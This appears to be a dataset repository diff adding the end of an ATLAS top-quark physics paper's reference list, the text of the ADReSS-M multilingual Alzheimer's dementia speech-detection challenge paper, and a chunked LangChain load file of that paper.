+ quark production at the Tevatron, Phys. Rev. Lett. 120 (2018) 042001,
2351
+ arXiv: 1709.04894 [hep-ex].
2352
+ [14]
2353
+ ATLAS and CMS Collaborations, Combination of inclusive and differential 𝑡¯𝑡 charge asymmetry
2354
+ measurements using ATLAS and CMS data at √𝑠 = 7 and 8 TeV, JHEP 04 (2018) 033,
2355
+ arXiv: 1709.05327 [hep-ex].
2356
+ [15]
2357
+ ATLAS Collaboration,
2358
+ Evidence for the charge asymmetry in 𝑝𝑝 → 𝑡¯𝑡 production at √𝑠 = 13 TeV with the ATLAS detector,
2359
+ (2022), arXiv: 2208.12095 [hep-ex].
2360
+ 25
2361
+
2362
+ [16]
2363
+ CMS Collaboration, Measurement of the 𝑡¯𝑡 charge asymmetry in events with highly Lorentz-boosted
2364
+ top quarks in 𝑝𝑝 collisions at √𝑠 = 13 TeV, (2022), arXiv: 2208.02751 [hep-ex].
2365
+ [17]
2366
+ CMS Collaboration, Measurements of 𝑡¯𝑡 differential cross sections in proton–proton collisions at
2367
+ √𝑠 = 13 TeV using events containing two leptons, JHEP 02 (2019) 149,
2368
+ arXiv: 1811.06625 [hep-ex].
2369
+ [18]
2370
+ ATLAS Collaboration, Measurement of the charge asymmetry in top-quark pair production in
2371
+ association with a photon with the ATLAS experiment, (2022), arXiv: 2212.10552 [hep-ex].
2372
+ [19]
2373
+ ATLAS Collaboration, The ATLAS Experiment at the CERN Large Hadron Collider,
2374
+ JINST 3 (2008) S08003.
2375
+ [20]
2376
+ ATLAS Collaboration, ATLAS Insertable B-Layer Technical Design Report,
2377
+ ATLAS-TDR-19; CERN-LHCC-2010-013, 2010,
2378
+ url: https://cds.cern.ch/record/1291633, Addendum: ATLAS-TDR-19-ADD-1;
2379
+ CERN-LHCC-2012-009, 2012, url: https://cds.cern.ch/record/1451888.
2380
+ [21]
2381
+ B. Abbott et al., Production and integration of the ATLAS Insertable B-Layer,
2382
+ JINST 13 (2018) T05008, arXiv: 1803.00844 [physics.ins-det].
2383
+ [22]
2384
+ ATLAS Collaboration, Performance of the ATLAS trigger system in 2015,
2385
+ Eur. Phys. J. C 77 (2017) 317, arXiv: 1611.09661 [hep-ex].
2386
+ [23]
2387
+ ATLAS Collaboration, The ATLAS Collaboration Software and Firmware,
2388
+ ATL-SOFT-PUB-2021-001, 2021, url: https://cds.cern.ch/record/2767187.
2389
+ [24]
2390
+ ATLAS Collaboration,
2391
+ Luminosity determination in 𝑝𝑝 collisions at √𝑠 = 13 TeV using the ATLAS detector at the LHC,
2392
+ ATLAS-CONF-2019-021, 2019, url: https://cds.cern.ch/record/2677054.
2393
+ [25]
2394
+ G. Avoni et al., The new LUCID-2 detector for luminosity measurement and monitoring in ATLAS,
2395
+ JINST 13 (2018) P07017.
2396
+ [26]
2397
+ T. Sjöstrand, S. Mrenna and P. Skands, A brief introduction to PYTHIA 8.1,
2398
+ Comput. Phys. Commun. 178 (2008) 852, arXiv: 0710.3820 [hep-ph].
2399
+ [27]
2400
+ R. D. Ball et al., Parton distributions with LHC data, Nucl. Phys. B 867 (2013) 244,
2401
+ arXiv: 1207.1303 [hep-ph].
2402
+ [28]
2403
+ ATLAS Collaboration, The Pythia 8 A3 tune description of ATLAS minimum bias and inelastic
2404
+ measurements incorporating the Donnachie–Landshoff diffractive model,
2405
+ ATL-PHYS-PUB-2016-017, 2016, url: https://cds.cern.ch/record/2206965.
2406
+ [29]
2407
+ GEANT4 Collaboration, S. Agostinelli et al., Geant4 – a simulation toolkit,
2408
+ Nucl. Instrum. Meth. A 506 (2003) 250.
2409
+ [30]
2410
+ ATLAS Collaboration, The ATLAS Simulation Infrastructure, Eur. Phys. J. C 70 (2010) 823,
2411
+ arXiv: 1005.4568 [physics.ins-det].
2412
+ [31]
2413
+ E. Bothmann et al., Event generation with Sherpa 2.2, SciPost Phys. 7 (2019) 034,
2414
+ arXiv: 1905.09127 [hep-ph].
2415
+ [32]
2416
+ R. D. Ball et al., Parton distributions for the LHC run II, JHEP 04 (2015) 040,
2417
+ arXiv: 1410.8849 [hep-ph].
2418
+ [33]
2419
+ T. Gleisberg and S. Höche, Comix, a new matrix element generator, JHEP 12 (2008) 039,
2420
+ arXiv: 0808.3674 [hep-ph].
2421
+ 26
2422
+
2423
+ [34]
2424
+ S. Schumann and F. Krauss,
2425
+ A parton shower algorithm based on Catani–Seymour dipole factorisation, JHEP 03 (2008) 038,
2426
+ arXiv: 0709.1027 [hep-ph].
2427
+ [35]
2428
+ F. Cascioli, P. Maierhöfer and S. Pozzorini, Scattering Amplitudes with Open Loops,
2429
+ Phys. Rev. Lett. 108 (2012) 111601, arXiv: 1111.5206 [hep-ph].
2430
+ [36]
2431
+ A. Denner, S. Dittmaier and L. Hofer,
2432
+ Collier: A fortran-based complex one-loop library in extended regularizations,
2433
+ Comput. Phys. Commun. 212 (2017) 220, arXiv: 1604.06792 [hep-ph].
2434
+ [37]
2435
+ Particle Data Group, Review of Particle Physics, PTEP 2022 (2022) 083C01.
2436
+ [38]
2437
+ S. Kallweit, J. M. Lindert, P. Maierhöfer, S. Pozzorini and M. Schönherr, NLO QCD+EW
2438
+ predictions for V + jets including off-shell vector-boson decays and multijet merging,
2439
+ JHEP 04 (2016) 021, arXiv: 1511.08692 [hep-ph].
2440
+ [39]
2441
+ J. Alwall, M. Herquet, F. Maltoni, O. Mattelaer and T. Stelzer, MadGraph 5 : going beyond,
2442
+ JHEP 06 (2011) 128, arXiv: 1106.0522 [hep-ph].
2443
+ [40]
2444
+ J. Alwall et al., The automated computation of tree-level and next-to-leading order differential cross
2445
+ sections, and their matching to parton shower simulations, JHEP 07 (2014) 079,
2446
+ arXiv: 1405.0301 [hep-ph].
2447
+ [41]
2448
+ T. Sjöstrand et al., An introduction to PYTHIA 8.2, Comput. Phys. Commun. 191 (2015) 159,
2449
+ arXiv: 1410.3012 [hep-ph].
2450
+ [42]
2451
+ R. Frederix and S. Frixione, Merging meets matching in MC@NLO, JHEP 12 (2012) 061,
2452
+ arXiv: 1209.6215 [hep-ph].
2453
+ [43]
2454
+ S. Catani, F. Krauss, B. R. Webber and R. Kuhn, QCD Matrix Elements + Parton Showers,
2455
+ JHEP 11 (2001) 063, arXiv: hep-ph/0109231.
2456
+ [44]
2457
+ K. Hamilton, P. Nason and G. Zanderighi, MINLO: multi-scale improved NLO,
2458
+ JHEP 10 (2012) 155, arXiv: 1206.3572 [hep-ph].
2459
+ [45]
2460
+ ATLAS Collaboration, ATLAS Pythia 8 tunes to 7 TeV data, ATL-PHYS-PUB-2014-021, 2014,
2461
+ url: https://cds.cern.ch/record/1966419.
2462
+ [46]
2463
+ S. Frixione, E. Laenen, P. Motylinski and B. R. Webber, Angular correlations of lepton pairs from
2464
+ vector boson and top quark decays in Monte Carlo simulations, JHEP 04 (2007) 081,
2465
+ arXiv: hep-ph/0702198.
2466
+ [47]
2467
+ P. Artoisenet, R. Frederix, O. Mattelaer and R. Rietkerk,
2468
+ Automatic spin-entangled decays of heavy resonances in Monte Carlo simulations,
2469
+ JHEP 03 (2013) 015, arXiv: 1212.3460 [hep-ph].
2470
+ [48]
2471
+ S. Frixione, P. Nason and C. Oleari,
2472
+ Matching NLO QCD computations with parton shower simulations: the POWHEG method,
2473
+ JHEP 11 (2007) 070, arXiv: 0709.2092 [hep-ph].
2474
+ [49]
2475
+ G. Corcella et al., HERWIG 6: an event generator for hadron emission reactions with interfering
2476
+ gluons (including supersymmetric processes), JHEP 01 (2001) 010, arXiv: hep-ph/0011363.
2477
+ [50]
2478
+ M. Bähr et al., Herwig++ physics and manual, Eur. Phys. J. C 58 (2008) 639,
2479
+ arXiv: 0803.0883 [hep-ph].
2480
+ [51]
2481
+ J. Bellm et al., Herwig 7.2 release note, Eur. Phys. J. C 80 (2020) 452,
2482
+ arXiv: 1912.06509 [hep-ph].
2483
+ 27
2484
+
2485
+ [52]
2486
+ K. Melnikov, M. Schulze and A. Scharf,
2487
+ QCD corrections to top quark pair production in association with a photon at hadron colliders,
2488
+ Phys. Rev. D 83 (2011) 074013, arXiv: 1102.1967 [hep-ph].
2489
+ [53]
2490
+ M. Czakon and A. Mitov,
2491
+ NNLO corrections to top pair production at hadron colliders: the quark-gluon reaction,
2492
+ JHEP 01 (2013) 080, arXiv: 1210.6832 [hep-ph].
2493
+ [54]
2494
+ D. de Florian et al.,
2495
+ Handbook of LHC Higgs Cross Sections: 4. Deciphering the Nature of the Higgs Sector, (2016),
2496
+ arXiv: 1610.07922 [hep-ph].
2497
+ [55]
2498
+ N. Kidonakis,
2499
+ Two-loop soft anomalous dimensions for single top quark associated production with a 𝑊− or 𝐻−,
2500
+ Phys. Rev. D 82 (2010) 054018, arXiv: 1005.4451 [hep-ph].
2501
+ [56]
2502
+ J. Bellm et al., Herwig 7.1 Release Note, (2017), arXiv: 1705.06919 [hep-ph].
2503
+ [57]
2504
+ F. Demartin, B. Maier, F. Maltoni, K. Mawatari and M. Zaro,
2505
+ tWH associated production at the LHC, Eur. Phys. J. C 77 (2017) 34,
2506
+ arXiv: 1607.05862 [hep-ph].
2507
+ [58]
2508
+ ATLAS Collaboration, Measurement of the 𝑍/𝛾∗ boson transverse momentum distribution in 𝑝𝑝
2509
+ collisions at √𝑠 = 7 TeV with the ATLAS detector, JHEP 09 (2014) 145,
2510
+ arXiv: 1406.3660 [hep-ex].
2511
+ [59]
2512
+ K. Melnikov and F. Petriello,
2513
+ Electroweak gauge boson production at hadron colliders through O(𝛼2
2514
+ 𝑠),
2515
+ Phys. Rev. D 74 (2006) 114017, arXiv: hep-ph/0609070.
2516
+ [60]
2517
+ P. Golonka and Z. Was,
2518
+ PHOTOS Monte Carlo: a precision tool for QED corrections in 𝑍 and 𝑊 decays,
2519
+ Eur. Phys. J. C 45 (2006) 97, arXiv: hep-ph/0506026.
2520
+ [61]
2521
+ D. J. Lange, The EvtGen particle decay simulation package,
2522
+ Nucl. Instrum. Meth. A 462 (2001) 152.
2523
+ [62]
2524
+ ATLAS Collaboration, Electron and photon performance measurements with the ATLAS detector
2525
+ using the 2015–2017 LHC proton–proton collision data, JINST 14 (2019) P12006,
2526
+ arXiv: 1908.00005 [hep-ex].
2527
+ [63]
2528
+ ATLAS Collaboration, Muon reconstruction performance of the ATLAS detector in proton–proton
2529
+ collision data at √𝑠 = 13 TeV, Eur. Phys. J. C 76 (2016) 292, arXiv: 1603.05598 [hep-ex].
2530
+ [64]
2531
+ ATLAS Collaboration, Muon reconstruction and identification efficiency in ATLAS using the full
2532
+ Run 2 𝑝𝑝 collision data set at √𝑠 = 13 TeV, Eur. Phys. J. C 81 (2021) 578,
2533
+ arXiv: 2012.00578 [hep-ex].
2534
+ [65]
2535
+ M. Cacciari, G. P. Salam and G. Soyez, The anti-𝑘𝑡 jet clustering algorithm, JHEP 04 (2008) 063,
2536
+ arXiv: 0802.1189 [hep-ph].
2537
+ [66]
2538
+ ATLAS Collaboration,
2539
+ Jet reconstruction and performance using particle flow with the ATLAS Detector,
2540
+ Eur. Phys. J. C 77 (2017) 466, arXiv: 1703.10485 [hep-ex].
2541
+ [67]
2542
+ M. Cacciari, G. P. Salam and G. Soyez, FastJet user manual, Eur. Phys. J. C 72 (2012) 1896,
2543
+ arXiv: 1111.6097 [hep-ph].
2544
+ 28
2545
+
2546
+ [68]
2547
+ ATLAS Collaboration, Jet energy scale and resolution measured in proton–proton collisions at
2548
+ √𝑠 = 13 TeV with the ATLAS detector, Eur. Phys. J. C 81 (2020) 689,
2549
+ arXiv: 2007.02645 [hep-ex].
2550
+ [69]
2551
+ ATLAS Collaboration, Tagging and suppression of pileup jets with the ATLAS detector,
2552
+ ATLAS-CONF-2014-018, 2014, url: https://cds.cern.ch/record/1700870.
2553
+ [70]
2554
+ ATLAS Collaboration, Performance of pile-up mitigation techniques for jets in 𝑝𝑝 collisions at
2555
+ √𝑠 = 8 TeV using the ATLAS detector, Eur. Phys. J. C 76 (2016) 581,
2556
+ arXiv: 1510.03823 [hep-ex].
2557
+ [71]
2558
+ ATLAS Collaboration, ATLAS 𝑏-jet identification performance and efficiency measurement with 𝑡¯𝑡
2559
+ events in 𝑝𝑝 collisions at √𝑠 = 13 TeV, Eur. Phys. J. C 79 (2019) 970,
2560
+ arXiv: 1907.05120 [hep-ex].
2561
+ [72]
2562
+ ATLAS Collaboration, ATLAS flavour-tagging algorithms for the LHC Run 2 𝑝𝑝 collision dataset,
2563
+ (2022), arXiv: 2211.16345 [physics.data-an].
2564
+ [73]
2565
+ ATLAS Collaboration, Performance of missing transverse momentum reconstruction with the
2566
+ ATLAS detector using proton–proton collisions at √𝑠 = 13 TeV, Eur. Phys. J. C 78 (2018) 903,
2567
+ arXiv: 1802.08168 [hep-ex].
2568
+ [74]
2569
+ ATLAS Collaboration, Performance of the ATLAS muon triggers in Run 2,
2570
+ JINST 15 (2020) P09015, arXiv: 2004.13447 [hep-ex].
2571
+ [75]
2572
+ ATLAS Collaboration, Performance of electron and photon triggers in ATLAS during LHC Run 2,
2573
+ Eur. Phys. J. C 80 (2020) 47, arXiv: 1909.00761 [hep-ex].
2574
+ [76]
2575
+ F. Pedregosa et al., Scikit-learn: machine learning in python,
2576
+ Journal of Machine Learning Research 12 (2011) 2825,
2577
+ url: https://dl.acm.org/doi/10.5555/1953048.2078195.
2578
+ [77]
2579
+ ATLAS Collaboration, Electron reconstruction and identification in the ATLAS experiment using
2580
+ the 2015 and 2016 LHC proton–proton collision data at √𝑠 = 13 TeV, Eur. Phys. J. C 79 (2019) 639,
2581
+ arXiv: 1902.04655 [hep-ex].
2582
+ [78]
2583
+ ATLAS Collaboration,
2584
+ Optimisation and performance studies of the ATLAS 𝑏-tagging algorithms for the 2017-18 LHC run,
2585
+ ATL-PHYS-PUB-2017-013, 2017, url: https://cds.cern.ch/record/2273281.
2586
+ [79]
2587
+ ATLAS Collaboration, Calibration of light-flavour 𝑏-jet mistagging rates using ATLAS
2588
+ proton–proton collision data at √𝑠 = 13 TeV, ATLAS-CONF-2018-006, 2018,
2589
+ url: https://cds.cern.ch/record/2314418.
2590
+ [80]
2591
+ J. Butterworth et al., PDF4LHC recommendations for LHC Run II, J. Phys. G 43 (2016) 023001,
2592
+ arXiv: 1510.03865 [hep-ph].
2593
+ [81]
2594
+ ATLAS Collaboration, Observation of the associated production of a top quark and a 𝑍 boson in
2595
+ 𝑝𝑝 collisions at √𝑠 = 13 TeV with the ATLAS detector, JHEP 07 (2020) 124,
2596
+ arXiv: 2002.07546 [hep-ex].
2597
+ [82]
2598
+ W. Verkerke and D. Kirkby, The RooFit toolkit for data modeling, 2003,
2599
+ arXiv: physics/0306116 [physics.data-an].
2600
+ [83]
2601
+ M. Cacciari, G. P. Salam and G. Soyez, The catchment area of jets, JHEP 04 (2008) 005,
2602
+ arXiv: 0802.1188 [hep-ph].
2603
+ 29
2604
+
HtE2T4oBgHgl3EQf_AnW/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf ADDED
Binary file (59.4 kB). View file
 
IdE5T4oBgHgl3EQfWw_6/content/tmp_files/2301.05562v1.pdf.txt ADDED
@@ -0,0 +1,187 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ arXiv:2301.05562v1 [eess.AS] 13 Jan 2023
2
+ MULTILINGUAL ALZHEIMER’S DEMENTIA RECOGNITION THROUGH SPONTANEOUS
3
+ SPEECH: A SIGNAL PROCESSING GRAND CHALLENGE
4
+ Saturnino Luz1, Fasih Haider1, Davida Fromm2, Ioulietta Lazarou3,
5
+ Ioannis Kompatsiaris3 and Brian MacWhinney2
6
+ 1 Usher Institute, Edinburgh Medical School, The University of Edinburgh, UK
7
+ 2 Department of Psychology, Carnegie Mellon University, USA
8
+ 3 Information Technologies Institute, CERTH, Thermi-Thessaloniki, Greece
9
+ ABSTRACT
10
+ This Signal Processing Grand Challenge (SPGC) targets a
11
+ difficult automatic prediction problem of societal and medi-
12
+ cal relevance, namely, the detection of Alzheimer’s Demen-
13
+ tia (AD). Participants were invited to employ signal process-
14
+ ing and machine learning methods to create predictive mod-
15
+ els based on spontaneous speech data. The Challenge has
16
+ been designed to assess the extent to which predictive models
17
+ built based on speech in one language (English) generalise to
18
+ another language (Greek). To the best of our knowledge no
19
+ work has investigated acoustic features of the speech signal in
20
+ multilingual AD detection. Our baseline system used conven-
21
+ tional machine learning algorithms with Active Data Repre-
22
+ sentation of acoustic features, achieving accuracy of 73.91%
23
+ on AD detection, and 4.95 root mean squared error on cogni-
24
+ tive score prediction.
25
+ Index Terms— Alzheimer’s dementia detection, speech
26
+ processing, speech biomarkers.
27
+ 1. INTRODUCTION
28
+ Dementia is a category of neurodegenerative diseases that en-
29
+ tail a long-term and usually gradual decrease of cognitive
30
+ functioning.
31
+ As cost-effective and accurate biomarkers of
32
+ neurodegeneration have been sought in the field of demen-
33
+ tia research, speech-based “digital biomarkers” have emerged
34
+ as a promising possibility. While there has been much inter-
35
+ est in automated methods for cognitive impairment detection
36
+ through speech by the signal processing and machine learn-
37
+ ing communities [1], most of the proposed approaches have
38
+ not investigated which speech features can be generalised and
39
+ transferred across languages for AD prediction, and to the
40
+ best of our knowledge no work has investigated acoustic fea-
41
+ tures of speech in multilingual AD detection. This SPGC,
42
+ “ADReSS-M: Multilingual Alzheimer’s Dementia Recogni-
43
+ tion through Spontaneous Speech” targets this issue by defin-
44
+ ing prediction tasks whereby participants train their models
45
+ on English speech data and assess their models’ performance
46
+ on spoken Greek data. The models submitted to the challenge
47
+ focus on acoustic or linguistic features of the speech signal
48
+ whose predictive power is preserved across languages.
49
+ This SPGC aims to provide a platform for contributions
50
+ and discussions on applying signal processing and machine
51
+ learning methods for multilingual AD recognition, and stim-
52
+ ulate the discussion of machine learning architectures, novel
53
+ signal processing features, feature selection and extraction
54
+ methods, and other topics of interest to the growing commu-
55
+ nity of researchers interested in investigating the connections
56
+ between speech and dementia.
57
+ 2. THE PREDICTION TASKS
58
+ The ADReSS-M challenge consists of the following tasks:
59
+ (1) a classification task, where the model will aim to dis-
60
+ tinguish healthy control speech from AD/MCI speech, and
61
+ (2) an MMSE score prediction (regression) task, where you
62
+ create a model to infer the speaker’s Mini Mental Status Ex-
63
+ amination (MMSE) score based on speech data. Participants
64
+ could choose to do one or both tasks. They were provided
65
+ with a training set and, two weeks prior to the paper submis-
66
+ sion deadline, with test sets on which to test their models. Up
67
+ to five sets of results were allowed for scoring for each task
68
+ per participant. All attempts had to be submitted together.
69
+ 2.1. The data sets
70
+ This SPGC data sets were made available through Dementia-
71
+ Bank1, upon request. The training dataset consists of spon-
72
+ taneous speech samples corresponding to audio recordings of
73
+ picture descriptions produced by cognitively normal subjects
74
+ and patients with an AD diagnosis, who were asked to de-
75
+ scribe the Cookie Theft picture from the Boston Diagnostic
76
+ Aphasia Examination test[2]. The participants were speak-
77
+ ers of English. The test set consists of spontaneous speech
78
+ descriptions of a different picture, in Greek. The recordings
79
+ were made in one of these languages. Participants were ini-
80
+ tially allowed access only to the training data (in English) and
81
+ some sample Greek data (8 recordings) for development pur-
82
+ poses.
83
+ 1https://dementia.talkbank.org/
84
+
85
+ The Greek recordings assess participants’ verbal fluency
86
+ and mood using a picture that the participant describes while
87
+ looking at it. The assessor first shows the participant a picture
88
+ representing a lion lying with a cub in the dessert while eat-
89
+ ing. The assessor then asks the participants to give a verbal
90
+ description of the picture in a few sentences.
91
+ The training dataset was balanced with respect to age and
92
+ gender in order to eliminate potential confounding and bias.
93
+ As we employed a propensity score approach to matching we
94
+ did not need to adjust for education, as it correlates with age
95
+ and gender, which suffice as an admissible for adjustment (see
96
+ [3, pp 348-352]). The dataset was checked for matching ac-
97
+ cording to scores defined in terms of the probability of an
98
+ instance being treated as AD given covariates age and gender
99
+ estimated through logistic regression, and matching instances
100
+ were selected. All standardized mean differences for the co-
101
+ variates were below 0.1 and all standardized mean differences
102
+ for squares and two-way interactions between covariates were
103
+ below 0.15, indicating adequate balance for those covariates.
104
+ 2.2. Evaluation
105
+ The classification task is evaluated in terms of accuracy,
106
+ specificity, sensitivity and F1 scores. For the regression task
107
+ (MMSE prediction), the metrics used are the coefficient of
108
+ determination and root mean squared error. The ranking of
109
+ submissions is based on accuracy scores for the classifica-
110
+ tion task (task 1), and on RMSE scores for the MMSE score
111
+ regression task (task 2).
112
+ 3. BASELINE MODELS
113
+ First we normalised the volume of audio files using ffmpeg’
114
+ EBU R128 scanner filter. A sliding window of 1 s, with no
115
+ overlap, was then applied to the audio, and eGeMAPS fea-
116
+ tures were extracted over these frames. The eGeMAPS fea-
117
+ ture set [4] is a basic set of acoustic features designed to de-
118
+ tect physiological changes in voice production. It contains
119
+ the F0 semitone, loudness, spectral flux, MFCC, jitter, shim-
120
+ mer, F1, F2, F3, alpha ratio, Hammarberg index and slope V0
121
+ features, as well as their most common statistical functionals,
122
+ totalling 88 features per frame. Given the eGeMAPS features,
123
+ we applied the active data representation method (ADR) [5]
124
+ to generate a frame level acoustic representation for each au-
125
+ dio recording. The ADR method has been used previously
126
+ to generate large scale time-series data representation. It em-
127
+ ploys self-organising mapping to cluster the original acoustic
128
+ features and then computes second-order features over these
129
+ clusters to extract new features [5]. This method is entirely
130
+ automatic in that no speech segmentation or diarisation infor-
131
+ mation is provided to the algorithm.
132
+ For task 1, we employed a Na¨ıve Bayes classifier with
133
+ kernel smoothing estimation. The ADR for feature extraction
134
+ was optimised using a grid search (C = 5, 10, 15, 20, 25).
135
+ We achieved accuracies of 75.00% and 73.91% on sample
136
+ and test data respectively using 15+2 ADR, age and gender
137
+ features per recording. On the test set, specificity was 79.2%,
138
+ precision was 75%, sensitivity was 68.2%, and F1 was 71.4%.
139
+ The feature to training audio ratio was 19:237.
140
+ For the MMSE regression task (task 2), we employed
141
+ a support vector machine (SVM) model with a RBF kernel
142
+ with box constraint of 1, and sequential minimal optimization
143
+ solver. The ADR for feature extraction was optimised using
144
+ a grid search (C = 5, 10, 15, 20, 25). This model achieved
145
+ a root mean squared error (RMSE) of 3.887 (r = 0.273)
146
+ and 4.955 (r = 0.348) on sample and test data respectively
147
+ using 25+2 ADR, age and gender features per recording. The
148
+ feature to training audio recordings ratio was also 29:237.
149
+ 4. CONCLUSION
150
+ Spontaneous speech analysis has the potential to enable novel
151
+ applications for speech technology in longitudinal, unob-
152
+ trusive monitoring of cognitive health. By focusing on AD
153
+ recognition using spontaneous speech, this SPGC investigates
154
+ an alternative to neuropsychological and clinical evaluation
155
+ approaches to AD detection and cognitive assessment. Fur-
156
+ thermore, the multilingual setting provided by this SPGC
157
+ allows the investigation of features that might generalise
158
+ across languages, extending the applicability of the models.
159
+ In keeping with the objectives of AD prediction evaluation,
160
+ the ADReSS-M challenge provides a statistically matched
161
+ data set so as to mitigate common biases often overlooked
162
+ in evaluations of AD detection methods, including repeated
163
+ occurrences of speech from the same participant, variations in
164
+ audio quality, and imbalances of gender, age and educational
165
+ level. We hope this might serve as a benchmark for future
166
+ research on multilingual AD assessment.
167
+ 5. REFERENCES
168
+ [1] S. de la Fuente Garcia, C. Ritchie, and S. Luz, “Artificial
169
+ intelligence, speech and language processing approaches
170
+ to monitoring Alzheimer’s disease: a systematic review,”
171
+ Journal of Alzheimer’s Disease, vol. 78, no. 4, 2020.
172
+ [2] J. Becker, F. Boller, O. Lopez, J. Saxton, and K. Mc-
173
+ Gonigle,
174
+ “The natural history of Alzheimer’s disease:
175
+ Description of study cohort and accuracy of diagnosis,”
176
+ Archives of Neurology, vol. 51, no. 6, pp. 585–594, 1994.
177
+ [3] J. Pearl, Causality: Models, Reasoning, and Inference,
178
+ Cambridge University Press, 2nd edition, 2009.
179
+ [4] F. Eyben et al., “The Geneva minimalistic acoustic pa-
180
+ rameter set for voice research and affective computing,”
181
+ IEEE Trans Affect Computing, vol. 7, no. 2, 2016.
182
+ [5] F. Haider, S. de la Fuente, and S. Luz,
183
+ “An assess-
184
+ ment of paralinguistic acoustic features for detection of
185
+ alzheimer’s dementia in spontaneous speech,” IEEE J Sel
186
+ Top Signal Process, vol. 14, no. 2, pp. 272–281, 2020.
187
+
IdE5T4oBgHgl3EQfWw_6/content/tmp_files/load_file.txt ADDED
@@ -0,0 +1,125 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ filepath=/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf,len=124
2
+ page_content='arXiv:2301.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
3
+ page_content='05562v1 [eess.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
4
+ page_content='AS] 13 Jan 2023 MULTILINGUAL ALZHEIMER’S DEMENTIA RECOGNITION THROUGH SPONTANEOUS SPEECH: A SIGNAL PROCESSING GRAND CHALLENGE Saturnino Luz1,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
5
+ page_content=' Fasih Haider1,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
6
+ page_content=' Davida Fromm2,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
7
+ page_content=' Ioulietta Lazarou3,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
8
+ page_content=' Ioannis Kompatsiaris3 and Brian MacWhinney2 1 Usher Institute,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
9
+ page_content=' Edinburgh Medical School,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
10
+ page_content=' The University of Edinburgh,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
11
+ page_content=' UK 2 Department of Psychology,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
12
+ page_content=' Carnegie Mellon University,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
13
+ page_content=' USA 3 Information Technologies Institute,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
14
+ page_content=' CERTH,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
15
+ page_content=' Thermi-Thessaloniki,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
16
+ page_content=' Greece ABSTRACT This Signal Processing Grand Challenge (SPGC) targets a difficult automatic prediction problem of societal and medi- cal relevance,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
17
+ page_content=' namely,' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
18
+ page_content=' the detection of Alzheimer’s Demen- tia (AD).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
19
+ page_content=' Participants were invited to employ signal process- ing and machine learning methods to create predictive mod- els based on spontaneous speech data.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
20
+ page_content=' The Challenge has been designed to assess the extent to which predictive models built based on speech in one language (English) generalise to another language (Greek).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
21
